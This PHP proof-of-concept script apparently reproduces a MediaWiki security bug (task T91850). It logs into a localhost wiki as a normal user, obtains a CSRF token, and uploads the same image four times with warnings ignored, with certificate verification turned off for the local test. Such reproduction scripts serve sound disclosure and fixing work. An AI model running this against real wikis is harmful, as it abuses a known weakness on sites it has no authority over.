Authored By
csteipp
Jul 2 2015, 4:24 PM

T91850-exploit.php

<?php
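// Cookie jar shared by every request below; it holds the session cookie
// once loginApi() succeeds.
$cookiefile = tempnam( "./", "CurlCookie-" );
if ( $cookiefile === false ) {
    die( "Could not create the cookie jar in the current directory\n" );
}
// Remove the jar on exit (including die()) so the session cookie is not
// left behind in the working directory.
register_shutdown_function( function () use ( $cookiefile ) {
    if ( file_exists( $cookiefile ) ) {
        unlink( $cookiefile );
    }
} );
$url = 'https://localhost/w/api.php';
$wikiUser = 'NormalUser';
$wikiPass = 'pass';
$file = './2x2.png';
if ( !is_readable( $file ) ) {
    die( "Cannot read upload source $file\n" );
}
loginApi( $wikiUser, $wikiPass );
$csrftoken = getCsrfToken();
// Upload the same image four times under distinct random names.
for ( $n = 1; $n < 5; ++$n ) {
    $filename = rand() . '-' . basename( $file );
    uploadFileApi( $filename, $file, $csrftoken, true );
}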
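/**
 * Upload a local file via action=upload as the currently logged-in user.
 *
 * Reads the session from the global cookie jar ($cookiefile) and posts to
 * the global API endpoint ($url). Dies on a transport error or when the API
 * does not report 'Success'.
 *
 * @param string $filename Target name for the file on the wiki
 * @param string $file Path of the local file to send
 * @param string $csrftoken Token obtained from getCsrfToken()
 * @param bool $ignoreWarnings Send ignorewarnings=1 with the request
 */
function uploadFileApi( $filename, $file, $csrftoken, $ignoreWarnings = false ) {
    global $cookiefile, $url;
    echo "Uploading: $filename, $file, $csrftoken\n";
    $params = array(
        'format' => 'json',
        'action' => 'upload',
        'token' => $csrftoken,
        'filename' => $filename,
        // CURLFile replaces the legacy "@path" prefix, which PHP 7+ no longer
        // treats as a file upload (the literal string would be sent instead).
        'file' => new CURLFile( $file ),
    );
    if ( $ignoreWarnings ) {
        $params['ignorewarnings'] = 1;
    }
    $ch = curl_init();
    curl_setopt( $ch, CURLOPT_URL, $url );
    curl_setopt( $ch, CURLOPT_PORT, 443 );
    // Verification is off for the localhost test instance (presumably a
    // self-signed certificate); keep it enabled against any real host.
    curl_setopt( $ch, CURLOPT_SSL_VERIFYPEER, 0 );
    curl_setopt( $ch, CURLOPT_HEADER, 0 );
    curl_setopt( $ch, CURLOPT_RETURNTRANSFER, 1 );
    curl_setopt( $ch, CURLOPT_COOKIEJAR, $cookiefile );
    curl_setopt( $ch, CURLOPT_COOKIEFILE, $cookiefile );
    curl_setopt( $ch, CURLOPT_POST, 1 );
    // An array body makes curl send multipart/form-data, which the file needs.
    curl_setopt( $ch, CURLOPT_POSTFIELDS, $params );
    $data = curl_exec( $ch );
    if ( $data === false || $data === '' ) {
        $error = curl_error( $ch );
        curl_close( $ch );
        die( "Curl error: $error\n" );
    }
    curl_close( $ch );
    $response = json_decode( $data );
    // Guard the property chain: a non-JSON body or an API error object has
    // no ->upload member.
    if ( !isset( $response->upload->result ) || $response->upload->result !== 'Success' ) {
        // print_r() needs the return flag, otherwise it prints and yields true.
        die( "Error uploading file: " . print_r( $response, true ) );
    }
    echo "Upload Successful\n";
}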
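/**
 * Log in through action=login and persist the session cookie in the global jar.
 *
 * Two requests are made on one curl handle: the first, with an empty
 * password, only fetches a login token; the second repeats the request with
 * the password and that token. Dies if either response is unusable or the
 * final result is not 'Success'.
 *
 * @param string $username Wiki account name
 * @param string $password Wiki account password
 */
function loginApi( $username, $password ) {
    global $cookiefile, $url;
    $ch = curl_init();
    curl_setopt( $ch, CURLOPT_URL, $url );
    curl_setopt( $ch, CURLOPT_PORT, 443 );
    // Verification is off for the localhost test instance (presumably a
    // self-signed certificate); keep it enabled against any real host.
    curl_setopt( $ch, CURLOPT_SSL_VERIFYPEER, 0 );
    curl_setopt( $ch, CURLOPT_HEADER, 0 );
    curl_setopt( $ch, CURLOPT_RETURNTRANSFER, 1 );
    curl_setopt( $ch, CURLOPT_COOKIEJAR, $cookiefile );
    curl_setopt( $ch, CURLOPT_COOKIEFILE, $cookiefile );
    curl_setopt( $ch, CURLOPT_POST, 1 );

    // Step 1: get a login token (the password is deliberately empty here).
    $params = array(
        'format' => 'json',
        'action' => 'login',
        'lgname' => $username,
        'lgpassword' => '',
    );
    curl_setopt( $ch, CURLOPT_POSTFIELDS, http_build_query( $params ) );
    $data = curl_exec( $ch );
    if ( $data === false || $data === '' ) {
        $error = curl_error( $ch );
        curl_close( $ch );
        die( "Curl error: $error\n" );
    }
    $response = json_decode( $data );
    if ( !isset( $response->login->token ) ) {
        curl_close( $ch );
        die( "No login token in response: " . print_r( $response, true ) );
    }
    $token = $response->login->token;
    echo "Login Token: $token\n";

    // Step 2: actual login, with the password and the token from step 1.
    $params['lgpassword'] = $password;
    $params['lgtoken'] = $token;
    curl_setopt( $ch, CURLOPT_POSTFIELDS, http_build_query( $params ) );
    $data = curl_exec( $ch );
    if ( $data === false || $data === '' ) {
        $error = curl_error( $ch );
        curl_close( $ch );
        die( "Curl error: $error\n" );
    }
    curl_close( $ch );
    $response = json_decode( $data );
    if ( !isset( $response->login->result ) || $response->login->result !== 'Success' ) {
        die( "Error logging in: " . print_r( $response, true ) );
    }
    echo "Login successful!\n";
}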
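/**
 * Fetch a CSRF token for the current session via action=query&meta=tokens.
 *
 * Uses the session cookie in the global jar ($cookiefile) and the global API
 * endpoint ($url). Dies on a transport error or when the response carries
 * no csrftoken.
 *
 * @return string The csrftoken value
 */
function getCsrfToken() {
    global $url, $cookiefile;
    $params = array(
        'format' => 'json',
        'action' => 'query',
        'meta' => 'tokens',
    );
    $ch = curl_init();
    curl_setopt( $ch, CURLOPT_URL, $url );
    curl_setopt( $ch, CURLOPT_PORT, 443 );
    // Verification is off for the localhost test instance (presumably a
    // self-signed certificate); keep it enabled against any real host.
    curl_setopt( $ch, CURLOPT_SSL_VERIFYPEER, 0 );
    curl_setopt( $ch, CURLOPT_HEADER, 0 );
    curl_setopt( $ch, CURLOPT_RETURNTRANSFER, 1 );
    curl_setopt( $ch, CURLOPT_COOKIEJAR, $cookiefile );
    curl_setopt( $ch, CURLOPT_COOKIEFILE, $cookiefile );
    curl_setopt( $ch, CURLOPT_POST, 1 );
    curl_setopt( $ch, CURLOPT_POSTFIELDS, http_build_query( $params ) );
    $data = curl_exec( $ch );
    if ( $data === false || $data === '' ) {
        $error = curl_error( $ch );
        curl_close( $ch );
        die( "Curl error: $error\n" );
    }
    curl_close( $ch );
    $response = json_decode( $data );
    // A non-JSON body or an API error object has no ->query->tokens chain.
    if ( !isset( $response->query->tokens->csrftoken ) ) {
        die( "No CSRF token in response: " . print_r( $response, true ) );
    }
    $token = $response->query->tokens->csrftoken;
    echo "CSRF Token: $token\n";
    return $token;
}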
